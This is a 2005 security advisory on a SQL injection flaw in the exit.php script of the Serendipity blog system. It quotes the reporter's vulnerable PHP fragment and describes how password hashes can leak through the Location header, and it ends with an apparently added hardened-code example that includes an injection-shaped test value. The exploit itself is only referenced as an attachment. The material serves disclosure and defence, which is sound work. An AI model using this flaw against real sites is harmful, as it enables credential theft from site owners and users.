Serendipity Input Validation Error in 'exit.php' Permits SQL Injection Attacks
SecurityTracker Alert ID: 1013699
SecurityTracker URL: http://securitytracker.com/id/1013699
CVE Reference: GENERIC-MAP-NOMATCH
Date: Apr 14 2005
Impact: Disclosure of system information, Disclosure of user information
Exploit Included: Yes
Version(s): 0.8beta4
Description:
An input validation vulnerability was reported in Serendipity. A remote user can inject SQL commands.
The 'exit.php' script does not properly validate user-supplied input in the 'url_id' and 'entry_id' parameters. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database.
ADZ Security Team reported this vulnerability.
Impact:
A remote user can execute SQL commands on the underlying database.
Solution:
No solution was available at the time of this entry.
Vendor URL: www.s9y.org/
Cause:
Input validation error
Underlying OS:
Linux (Any), UNIX (Any), Windows (Any)
Message History:
None.
Source Message Contents
Date: Wed, 13 Apr 2005 20:22:05 +0400
Subject: serendipity SQL Injection vulnerability
ADZ Security Team
===================
Info
Program: serendipity web blog system
Version: 0.8beta4
Module: exit.php
Bug type: SQL Injection
Vendor site: http://www.s9y.org/
Vendor Informed: Yes
===================
Bug Info
// code start
//.......
// $_GET['url_id'] and $_GET['entry_id'] are interpolated into the SQL string
// unquoted and without any validation.
$links = serendipity_db_query("SELECT link FROM {$serendipity['dbPrefix']}references
    WHERE id = {$_GET['url_id']} AND entry_id = {$_GET['entry_id']}", true);
//.......
// no checks here...
//.......
if (is_array($links) && isset($links['link'])) {
    // URL is valid. Track it.
    $url = $links['link'];
}
//......
// Whatever the query returned in the 'link' column is sent back to the
// client in the Location header.
if (serendipity_isResponseClean($url)) {
    header('HTTP/1.0 301 Moved Permanently');
    header('Location: ' . $url);
}
//......
// code end
As we see, if we insert some "bad" SQL code into $_GET['url_id'] or
$_GET['entry_id'], the server returns in the header "Location: xxxx", where it
is possible for there to be an account login/passwd hash :)
Sorry for my English :)
Exploit/PoC:
See exploit in attached adz_serendipity.pl
===================
Contact
ADZ Security Team
URL: http://adz.void.ru/
IRC: #adz @ QuakeNet
MAIL: kre0n@mail.ru, adz.kreon@gmail.com (for non-russian users)
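The same redirect flow with both request parameters validated before any SQL is built, as an added illustration that is not Serendipity's code or its actual fix. It assumes serendipity_db_query() and serendipity_isResponseClean() behave as in the fragment quoted above, that id and entry_id are integer columns, and the adz_example_* names are hypothetical.

```php
<?php
// Added illustration, not Serendipity's code or its actual fix: exit.php's
// redirect with both request parameters validated before any SQL is built.
// Assumes serendipity_db_query() and serendipity_isResponseClean() behave as
// in the advisory's fragment and that id / entry_id are integer columns.

// Return the value as a positive int, or null if it is anything else.
function adz_example_id(array $get, string $key): ?int
{
    if (!isset($get[$key])) {
        return null;
    }
    $id = filter_var($get[$key], FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Build the lookup query only from validated integers; null means "refuse".
function adz_example_safe_sql(array $get, string $prefix): ?string
{
    $urlId   = adz_example_id($get, 'url_id');
    $entryId = adz_example_id($get, 'entry_id');
    if ($urlId === null || $entryId === null) {
        return null;
    }
    return "SELECT link FROM {$prefix}references WHERE id = $urlId AND entry_id = $entryId";
}

// Hardened redirect flow. The Location value is only ever taken from a row
// that was actually found, and the original code's use of an unset $url when
// no row matched is avoided.
function adz_example_redirect(array $get, array $serendipity): void
{
    $sql = adz_example_safe_sql($get, $serendipity['dbPrefix']);
    if ($sql === null) {
        header('HTTP/1.0 400 Bad Request');
        return;
    }
    $links = serendipity_db_query($sql, true);
    if (is_array($links) && isset($links['link']) && serendipity_isResponseClean($links['link'])) {
        header('HTTP/1.0 301 Moved Permanently');
        header('Location: ' . $links['link']);
    }
}

// Constructed request values: a legitimate pair and an injection-shaped one.
$good = ['url_id' => '7', 'entry_id' => '42'];
$bad  = ['url_id' => '7 OR 1=1', 'entry_id' => '42'];
var_dump(adz_example_safe_sql($good, 's9y_')); // query built from the two ids
var_dump(adz_example_safe_sql($bad, 's9y_'));  // refused before any SQL is built
```

Validating the ids as integers closes the injection; it does not change what the 'link' column legitimately contains, so the redirect target itself still relies on serendipity_isResponseClean().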